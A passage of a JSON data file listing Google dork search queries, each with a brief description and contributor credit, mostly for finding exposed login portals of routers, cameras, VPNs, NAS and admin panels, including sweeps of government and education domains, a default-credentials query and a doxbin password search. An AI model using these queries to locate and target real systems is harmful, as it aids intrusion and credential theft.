07/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"login - otrs\" \"Login\" \"Powered by OTRS\"", "description": "# Google Dork: intitle:\"login - otrs\" \"Login\" \"Powered by OTRS\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 17/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/sslvpn_logon.shtml\" intitle:\"User Authentication\" \"WatchGuard Technologies\"", "description": "# Google Dork: inurl:\"/sslvpn_logon.shtml\" intitle:\"User\r\nAuthentication\" \"WatchGuard Technologies\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 21/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Plesk\" inurl:\"/login_up.php3\" \"Parallels IP Holdings GmbH\"", "description": "# Google Dork: intitle:\"Plesk\" inurl:\"/login_up.php3\" \"Parallels IP\r\nHoldings GmbH\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 21/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"ISPConfig\" \"Powered by ISPConfig\" \"login\"", "description": "# Google Dork: intitle:\"ISPConfig\" \"Powered by ISPConfig\" \"login\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 14/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:/web-ftp.cgi", "description": "# Google Dork: inurl:/web-ftp.cgi\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 1/07/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"XVR LOGIN\" inurl:\"/login.rsp\"", "description": "# Google Dork: intitle:\"XVR LOGIN\" inurl:\"/login.rsp\"\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 29/06/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"iMana 200 login\"", "description": "# Dork: intitle:\"iMana 200 login\""}, {"dork": "intitle:\"WebMO Login\" inurl:/~webmo/cgi-bin/login.cgi", "description": "# Google Dork: intitle:\"WebMO Login\" inurl:/~webmo/cgi-bin/login.cgi\r\n\r\n# Pages Containing Login Portals.\r\n\r\n# Exploit Author: Sarmad Khan"}, {"dork": "inurl:/psp/ intext:\"ORACLE PEOPLESOFT\"", "description": "# Google Dork: inurl:/psp/ intext:\"ORACLE PEOPLESOFT\"\r\n\r\n# Pages Containing Login Portals.\r\n\r\n# Exploit Author: Sarmad Khan"}, {"dork": "intitle:\"Nutanix Web Console\"", "description": "# Exploit Title: Pages Containing Login Portals\r\n\r\n# Google Dork: intitle:\"Nutanix Web Console\"\r\n\r\n# Date: 2021-06-28\r\n\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:\"Identity Services Engine\" inurl:login.jsp", "description": "# Google Dork: intitle:\"Identity Services Engine\" inurl:login.jsp\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 20/07/2021\r\n\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "site:*.zendesk.com/auth/v2/login/registration", "description": "# Google Dork: site:*.zendesk.com/auth/v2/login/registration\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Exploit Author: Ritesh Gohil"}, {"dork": "intext:\"Switch Administrator\" inurl:config/log_off_page", "description": "# Google Dork: intext:\"Switch Administrator\" inurl:config/log_off_page\r\n\r\n# Category: Pages Containing Login Portals\r\n\r\n# Date: 05/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:\"pages/sdcall/Login.jsp\"", "description": "# Google Dork: inurl:\"pages/sdcall/Login.jsp\"\r\n\r\n# Pages Containing Login Portals (Cisco ServiceGrid)\r\n\r\n# Date: 21/07/2021\r\n\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intext:Paessler AG - The Network Monitoring Company inurl:/index.htm intitle:\"Welcome | PRTG Network Monitor\" -\"User Manual\"", "description": "# Google Dork: intext:Paessler AG - The Network Monitoring Company inurl:/index.htm intitle:\"Welcome | PRTG Network Monitor\" -\"User Manual\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 21/07/2021\r\n\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intext:\"Lancom\" intitle:\"Router - Login\" -.com", "description": "# Google Dork: intext:\"Lancom\" intitle:\"Router - Login\" -.com\r\n\r\n# Category: Pages Containing Login Portals\r\n\r\n# Date: 03/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "\"FM Monitoring Receiver\" intitle:\"login\" \"welcome!\"", "description": "# Google Dork: \"FM Monitoring Receiver\" intitle:\"login\" \"welcome!\"\r\n\r\n# Category: Pages Containing Login Portals\r\n\r\n# Date: 05/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:/UserLogin intitle:\"::PayTV SMS::\" \"Aplomb Technology\"", "description": "# Google Dork: inurl:/UserLogin intitle:\"::PayTV SMS::\" \"Aplomb Technology\" \r\n\r\n# Date: 23/07/2021 \r\n\r\n# Exploit Author: Neha Singh\r\n\r\n# Pages Containing Login Portals"}, {"dork": "intext:\"SGP\" inurl:/accounts/login?next=/admin/", "description": "# Google Dork: intext:\"SGP\" inurl:/accounts/login?next=/admin/\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:\"/tips/tipsLogin.action\"", "description": "# Google Dork: inurl:\"/tips/tipsLogin.action\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Grandstream Device Configuration\" (intext:password & intext:\"Grandstream Device Configuration\" & intext:\"Grandstream Networks\" | inurl:cgi-bin) -.com|org", "description": "# Google Dork: intitle:\"Grandstream Device Configuration\" (intext:password\r\n& intext:\"Grandstream Device Configuration\" & intext:\"Grandstream Networks\"\r\n| inurl:cgi-bin) -.com|org\r\n\r\n# Category: Pages Containing Login Portals\r\n\r\n# Date: 06/08/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"3G wireless gateway\" \"login\" intext:\"huawei technologies\"", "description": "# Google Dork: intitle:\"3G wireless gateway\" \"login\" intext:\"huawei technologies\"\r\n# Category: Various Online Devices\r\n# Date: 09/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"ADB Broadband\" login intext:\"ADB Broadband S.p.A\" -.com", "description": "# Google Dork: intitle:\"ADB Broadband\" login intext:\"ADB Broadband S.p.A\" -.com\r\n# Category: Various Online Devices\r\n# Date: 09/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"MediaAccess Gateway - Login\" \"access your MediaAccess Gateway\"", "description": "# Google Dork: intitle:\"MediaAccess Gateway - Login\" \"access your MediaAccess Gateway\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 09/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"ADMINISTRATOR LOGIN\" inurl:adminlogin", "description": "GOOGLE DORK: intitle:\"ADMINISTRATOR LOGIN\" inurl:adminlogin\r\n\r\nGIVES THE ADMINISTRATOR LOGIN PANELS"}, {"dork": "intitle:\"geovision inc.\" inurl:login.htm", "description": "# Google Dork: intitle:\"geovision inc.\" inurl:login.htm\r\n# Category: Various Online Devices\r\n# Date: 06/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"KNX-IP-Gateway Login\"", "description": "# Google Dork: intitle:\"KNX-IP-Gateway Login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"DGS-3100 Login\"", "description": "# Google Dork: intitle:\"DGS-3100 Login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "allintext:Welcome to the LabTech Web Portal", "description": "# Google Dork: allintext:Welcome to the LabTech Web Portal\r\n# LabTech Web Portal\r\n# Date: 10-07-2021\r\n# Exploit Author: Kamran Saifullah"}, {"dork": "intitle:\"Vue Element Admin\" intext:\"Username : admin\" OR intext:\"Username : editor\" OR intext:\"Password : any\"", "description": "# Google Dork : intitle:\"Vue Element Admin\" intext:\"Username : admin\" OR intext:\"Username : editor\" OR intext:\"Password : any\"\r\n# Vue Element Admin login pages with default credentials.\r\n#Author: Naveen Prakaasham K S V"}, {"dork": "intitle:\"web admin login\" \"Huawei Technologies\"", "description": "# Google Dork: intitle:\"web admin login\" \"Huawei Technologies\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login - Hitron technologies\"", "description": "# Google Dork: intitle:\"Login - Hitron technologies\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Video web server\" \"login\"", "description": "# Google Dork: intitle:\"Video web server\" \"login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 02/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"vigor login page\"", "description": "# Google Dork: intitle:\"vigor login page\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 02/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:prweb/PRAuth", "description": "# Google Dork: inurl:prweb/PRAuth\r\n# Date: 6/30/2020\r\n# Exploit Author: Javier Bernardo\r\n# Pega Platform Login Pages"}, {"dork": "intext:\"developed and maintained by Netgate\" intitle:login", "description": "# Google Dork: intext:\"developed and maintained by Netgate\" intitle:login\r\n# Category: Pages Containing Login Portals\r\n# Date: 02/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"system login\" \"Drake Holdings\"", "description": "# Google Dork: intitle:\"system login\" \"Drake Holdings\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:mailscanner intitle:\"mailwatch login page\"", "description": "# Google Dork: inurl:mailscanner intitle:\"mailwatch login page\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:device_status.html \"login\"", "description": "# Google Dork: inurl:device_status.html \"login\"\r\n# Category: Various Online Devices\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"DEVICE\" \"Real-time IP Camera Monitoring System\"", "description": "# Google Dork: intitle:\"DEVICE\" \"Real-time IP Camera Monitoring System\"\r\n# Category: Various Online Devices\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:openam/XUI", "description": "# Google Dork: inurl:openam/XUI\r\n# Category: Pages Containing Login Portals\r\n# Dork Author: Nijin K"}, {"dork": "intitle:\"Mail2000 Message System\" \"Openfind Information\"", "description": "# Google Dork: intitle:\"Mail2000 Message System\" \"Openfind Information\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:\"serverpush.htm\" intext:\"Foscam\"", "description": "#Google Dork: inurl:\"serverpush.htm\" intext:\"Foscam\"\r\n# Various Online Devices\r\n# Date: 28/06/2021\r\n#Exploit Author: Neha Singh\r\n\r\n\r\n\r\n\r\n\r\n\r\nThanks and Regards\r\n Neha Singh"}, {"dork": "inurl:auth/login?returnUrl", "description": "Pages Containing Login Portals\r\n# Google Dork: inurl:auth/login?returnUrl\r\n# Date: 6/25/2020\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intitle:\"Login\" intext:\"IP Surveillance for Your Life\"", "description": "# Google Dork: intitle:\"Login\" intext:\"IP Surveillance for Your Life\"\r\n# Pages Containing Login Portals\r\n# Date: 12/07/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"R WebServer\"", "description": "# Google Dork: intitle:\"R WebServer\"\r\n# Pages Containing Login Portals\r\n# Date: 23/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"login\" inurl:\"idp/profile/login\"", "description": "# Google Dork: intitle:\"login\" inurl:\"idp/profile/login\"\r\n# Pages Containing Login Portals\r\n# Date: 14/07/2021 \r\n# Exploit Author: Abhijit Gaikwad"}, {"dork": "inurl:ui3.htm", "description": "# Google Dork: inurl:ui3.htm\r\n# Various online devices\r\n# Date: 18/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "inurl:oauth2/v2.0/authorize", "description": "# Google Dork: inurl:oauth2/v2.0/authorize\r\n# Date: 7/22/2020\r\n# Exploit Author: Javier Bernardo"}, {"dork": "\"Network State: Network Ready. Network Channel:\" intitle:ACEManager", "description": "# Google Dork: Network State: Network Ready. Network Channel: intitle:ACEManager\r\n# Date: 2021-06-28\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "inurl:\"admin/public/login\"", "description": "# Google Dork: inurl:\"admin/public/login\"\r\n# Pages Containing Login Portals\r\n# Date: 23/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "inurl:\"pis/login.aspx\"", "description": "# Google Dork: inurl:\"pis/login.aspx\"\r\n# Pages Containing Login Portals\r\n# Date: 23/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intext:\"Login to Frappe\" +\"Forgot Password?\" +\"Reset Password\" inurl:login -intitle:\"My utm\"", "description": "# Google Dork: intext:\"Login to Frappe\" +\"Forgot Password?\" +\"Reset Password\" inurl:login -intitle:\"My utm\" \r\n# Pages Containing Login Portals\r\n# Date: 29/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"weblogic\" login intext:\"footer powered by\"", "description": "# Google Dork: intitle:\"weblogic\" login intext:\"footer powered by\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Webmail Login\" intext:\"cPanel, L.L.C. \" +\"Change locale\"", "description": "# Google Dork: intitle:\"Webmail Login\" intext:\"cPanel, L.L.C. \" +\"Change locale\"\r\n# Pages Containing Login Portals\r\n# Date: 23/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"Powered by Deepija Telecom\"", "description": "# Google Dork: intitle:\"Powered by Deepija Telecom\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"idrac7 - Login\" inurl:login.html", "description": "# Google Dork: intitle:\"idrac7 - Login\" inurl:login.html\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"ovislink\" inurl:login intext:\"My Resource\"", "description": "# Google Dork: intitle:\"ovislink\" inurl:login intext:\"My Resource\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Web Viewer for Samsung DVR\"", "description": "# Google Dork: intitle:\"Web Viewer for Samsung DVR\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Web Viewer\" inurl:auth_index.htm", "description": "# Google Dork: intitle:\"Web Viewer\" inurl:auth_index.htm\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Asus Login\" inurl:Main_Login.asp", "description": "# Google Dork: intitle:\"Asus Login\" inurl:Main_Login.asp\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Wireless router\" inurl:login.htm -.com|ca", "description": "# Google Dork: intitle:\"Wireless router\" inurl:login.htm -.com|ca\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Synology Disk Station\" intext:\"System administrator\" \"login\"", "description": "# intitle:\"Synology Disk Station\" intext:\"System administrator\" \"login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"SonicWall Network Security Login\"", "description": "# Google Dork: intitle:\"SonicWall Network Security Login\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Seagate NAS -\" \"login\" intext:\"Language.\" -.com", "description": "# Google Dork: intitle:\"Seagate NAS -\" \"login\" intext:\"Language.\" -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Prolink\" inurl:login.htm -.com", "description": "# Google Dork: intitle:\"Prolink\" inurl:login.htm -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 31/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"prestige\" intext:\"Enter Password and click Login\" -.com", "description": "# Google Dork: intitle:\"prestige\" intext:\"Enter Password and click Login\" -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 31/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"PBX Login\" -inurl:pbx|pbxlogin -.com", "description": "# Google Dork: intitle:\"PBX Login\" -inurl:pbx|pbxlogin -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 31/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Mitel Standard Linux: Login Page\"", "description": "# Google Dork: intitle:\"Mitel Standard Linux: Login Page\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 04/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"ManageEngine ServiceDesk Plus\" \"domain\" intext:\"ManageEngine ServiceDesk Plus\" -.com", "description": "# Google Dork: intitle:\"ManageEngine ServiceDesk Plus\" \"domain\" intext:\"ManageEngine ServiceDesk Plus\" -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 04/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"WEB SERVICE\" \"Modify Admin Password\"", "description": "# Google Dork: intitle:\"WEB SERVICE\" \"Modify Admin Password\"\r\n# Pages Containing Login Portals\r\n# Date: 03/08/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"Lantronix\" intext:\"Lantronix, Inc\" \"login to\" -.com", "description": "# Google Dork: intitle:\"Lantronix\" intext:\"Lantronix, Inc\" \"login to\" -.com\r\n# Category: Pages Containing Login Portals\r\n# Date: 04/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"LaCie\" \"login\" intext:\"Remember me\" \"Connect to\"", "description": "# Google Dork: intitle:\"LaCie\" \"login\" intext:\"Remember me\" \"Connect to\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 04/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login - Ipswitch WhatsUp Professional\"", "description": "# Google Dork: intitle:\"Login - Ipswitch WhatsUp Professional\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Login\" inurl:\"view/login.html\" \"Huawei Technologies\"", "description": "# Google Dork: intitle:\"Login\" inurl:\"view/login.html\" \"Huawei Technologies\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 06/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:Login.aspx intitle:\":::Login:::\" \"RM\"", "description": "# Google Dork: inurl:Login.aspx intitle:\":::Login:::\" \"RM\" \r\n# Pages Containing Login Portals\r\n# Date: 05/08/2021 \r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"IBM iNotes Login\" \"Ultralite Login Screen\"", "description": "# Google Dork: intitle:\"IBM iNotes Login\" \"Ultralite Login Screen\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "Jira login intext:v8.3.2", "description": "# Google Dork: Jira login intext:v8.3.2\r\n# Dork can be changed on target base like *Jira login intext:v*7.0.5 , *Jira login intext:v6.0.3*\r\n# Date: 06/08/2021\r\n# Exploit Author: tamimhasan404"}, {"dork": "intitle:\"Web Admin login\" intext:\"Huawei Technologies\"", "description": "# Google Dork: intitle:\"Web Admin login\" intext:\"Huawei Technologies\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 06/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Log In - Seafile Server\"", "description": "# Google Dork: intitle:\"Log In - Seafile Server\"\r\n# Pages Containing Login Portals\r\n# Date: 20/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:\"webconsole/webpages/login.jsp\" +intitle:\"Sophos\"", "description": "# Google Dork: inurl:\"webconsole/webpages/login.jsp\" +intitle:\"Sophos\"\r\n# Pages Containing Login Portals\r\n# Date: 09/08/2021 \r\n# Exploit Author: hummerston"}, {"dork": "intitle:\"WHM Login\" intext:\"cPanel, L.L.C. \" +\"Change locale\"", "description": "# Google Dork: intitle:\"WHM Login\" intext:\"cPanel, L.L.C. \" +\"Change locale\"\r\n# Pages Containing Login Portals\r\n# Date: 23/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"Honeywell XL Web Controller\" intext:\"systemadmin\"", "description": "# Google Dork: intitle:\"Honeywell XL Web Controller\" intext:\"systemadmin\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 06/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intext:\"powered by enboard\" \"portal\"", "description": "# Google Dork: intext:\"powered by enboard\" \"portal\"\r\n# Pages Containing Login Portals\r\n# Date: 26/06/2021 \r\n# Exploit Author: Hindustani Hacker"}, {"dork": "inurl:users/password/new", "description": "# Google Dork: intitle:\"R WebServer\"\r\n# Various pages containing forgot password portals\r\n# Date: 23/08/2021 \r\n# Exploit Author: Vaibhav Kumar Srivastava"}, {"dork": "intitle:\"BoardPAC - Board Paper and Credit Proposal Management System\"", "description": "# Google Dork: intitle:\"BoardPAC - Board Paper and Credit Proposal Management System\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 26/08/2021\r\n# Exploit Author: Harsh J, Omkar G, Amit C"}, {"dork": "intitle:\"Polycom Login\" inurl:\"/login.html\"", "description": "# Google Dork: intitle:\"Polycom Login\" inurl:\"/login.html\"\r\n# Pages Containing Login Portals\r\n#Date: 27/08/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intext:\"amcrest\" \"Invalid login credentials\"", "description": "#Google Dork: intext:\"amcrest\" \"Invalid login credentials\"\r\n# Date: 25/06/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intext:\"Powered by Bitnami Redmine Stack\" inurl:/login", "description": "# Google Dork: intext:\"Powered by Bitnami Redmine Stack\" inurl:/login\r\n# Pages Containing Login Portals\r\n# Date: 27/08/2021 \r\n# Exploit Author: Inderjeet Singh"}, {"dork": "Dork:- intitle:*admin (inurl:login)", "description": "# Google Dork: intitle:*admin (inurl:login)\r\n# Pages Containing Login Portals\r\n# Date: 29/08/2021 \r\n# Exploit Author: Durgesh Gupta"}, {"dork": "site:*/JIRA/login", "description": "# Google Dork: site:*/JIRA/login\r\n# Pages Containing Login Portals\r\n# Date: 29/08/2021 \r\n# Exploit Author: Siddesh Sapkal"}, {"dork": "site:gov.in intitle: admin login", "description": "# Google Dork: site:gov.in intitle: admin login\r\n# Pages Containing Login Portals\r\n# Date: 29/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "inurl:login.php site:.nl", "description": "# Google Dork: inurl:login.php site:.nl\r\n# Pages Containing Login Portals\r\n# Date: 29/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "intitle:\"NetBiter\" intext:\"based on NetBiter\" -.com", "description": "# Google Dork: intitle:\"NetBiter\" intext:\"based on NetBiter\" -.com\r\n# Pages Containing Login Portals\r\n# Date: 31/08/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "site:login.microsoftonline.com -error", "description": "# Google Dork: *site:login.microsoftonline.com\r\n# Pages Containing Login Portals\r\n# Date: 30/08/2021 \r\n# Exploit Author: Brahmaraj Rathod"}, {"dork": "inurl \"/admin/index.php\" username=admin&password=password", "description": "# Google Dork: inurl \"/admin/index.php\" username=admin&password=password\r\n# Pages Containing Login Portals\r\n# Date: 31/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "inurl:/about site:*.in", "description": "# Google Dork: inurl:/about site:*.in\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: Sarthi Shinde"}, {"dork": "inurl:/login site:.in", "description": "# Google Dork: inurl:/login site:.in\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021\r\n# Exploit Author: Sarthi Shinde"}, {"dork": "inurl:\"/userportal/webpages/myaccount/login.jsp\"", "description": "# Google Dork: inurl:\"/userportal/webpages/myaccount/login.jsp\"\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl /admin/login.php intitle panel admin", "description": "# Google Dork: inurl /admin/login.php intitle panel admin\r\n# Pages Containing Login Portals\r\n# Date: 31/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "site:*/admin.php inurl:files", "description": "# Google Dork: site:*/admin.php inurl:files\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle:\"TD-W9970\" intext:\"Model No. TD-W9970\" -tp-link.com", "description": "# Google Dork: intitle:\"TD-W9970\" intext:\"Model No. TD-W9970\" -tp-link.com\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:login/forgotten", "description": "# Google Dork: inurl:login/forgotten\r\n# Pages Containing Login Portals\r\n# Date: 31/08/2021 \r\n# Exploit Author: Vaibhav Kumar Srivastava"}, {"dork": "intitle:\"Users\" intext:\"Read License\" intext:\"vtiger.com\"", "description": "# Google Dork: intitle:\"Users\" intext:\"Read License\" intext:\"vtiger.com\"\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intext:\"Please enter the device's administrator password\"", "description": "# Google Dork: intext:\"Please enter the device's administrator password\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 02/09/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Router Access\" inurl:Router_Login.asp", "description": "# Google Dork: intitle:\"Router Access\" inurl:Router_Login.asp\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"IP CAMERA\" \"User Login\" \"User Name\" \"Password\" \"Preview Stream\"", "description": "# Google Dork: intitle:\"IP CAMERA\" \"User Login\" \"User Name\" \"Password\" \"Preview Stream\"\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "site:\".edu\" intitle:\"admin login\"", "description": "# Google Dork: site:\".edu\" intitle:\"admin login\"\r\n# Pages Containing Login Portals\r\n# Date: 02/09/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "Inurl:login.rsp \"User name\"", "description": "# Google Dork: inurl:login.rsp \"User name\"\r\n# Pages Containing Login Portals\r\n# Date: 22/07/2021 \r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"fdt\" intext:\"Remember me\" \"Username\"", "description": "# Google Dork: intitle:\"fdt\" intext:\"Remember me\" \"Username\"\r\n# Pages Containing Login Portals \r\n# Date: 02/09/2021 \r\n# Exploit Author: Neha Singh"}, {"dork": "site:\".uk\" intitle:\"admin login\"", "description": "# Google Dork: site:\".uk\" intitle:\"admin login\"\r\n# Pages Containing Login Portals\r\n# Date: 02/08/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "intext:\"Welcome to ZXHN H198A\"", "description": "# Google Dork: intext:\"Welcome to ZXHN H198A\"\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "site:\".ae\" intitle:\"admin login\"", "description": "# Google Dork: site:\".ae\" intitle:\"admin login\"\r\n# Pages Containing Login Portals\r\n# Date: 02/09/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "site:\".au\" intitle:\"admin login\"", "description": "# Google Dork: site:\".au\" intitle:\"admin login\"\r\n# Pages Containing Login Portals\r\n# Date: 02/09/2021 \r\n# Exploit Author: Sahil Gupta"}, {"dork": "\"Desktop\" \"Simple\" \"Responsive\" intitle:\"Controllr\"", "description": "# Google Dork: \"Desktop\" \"Simple\" \"Responsive\" intitle:\"Controllr\"\r\n# Pages Containing Login Portals\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "/inurl:upload site:doxbin.org ~password", "description": "# Google Dork: inurl:upload site:doxbin.org ~password\r\n# Pages Containing Login Portals\r\n# Date: 04/08/2021 \r\n# Exploit Author: Ujas Dhami"}, {"dork": "cms +inurl:login +site:\"gov.in\"", "description": "# Google Dork: cms +inurl:login +site:\"gov.in\"\r\n# Pages Containing Login Portals\r\n# Date: 04/08/2021 \r\n# Exploit Author: Ujas Dhami"}, {"dork": "intitle:\"WATTrouter\" \"SYSTEM WEB INTERFACE\"", "description": "# Google Dork: intitle:\"WATTrouter\" \"SYSTEM WEB INTERFACE\"\r\n# Various Online Devices\r\n# Date: 04/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:(\"administrator/login.aspx\" OR \"admin/login.aspx\") +site:.com", "description": "# Google Dork: inurl:(\"administrator/login.aspx\" OR \"admin/login.aspx\") +site:.com\r\n# Pages Containing Login Portals\r\n# Date: 04/09/2021 \r\n# Exploit Author: Ujas Dhami"}, {"dork": "intext:\"Atlassian Jira Project Management Software\" Jira login", "description": "# Google Dork: intext:\"Atlassian Jira Project 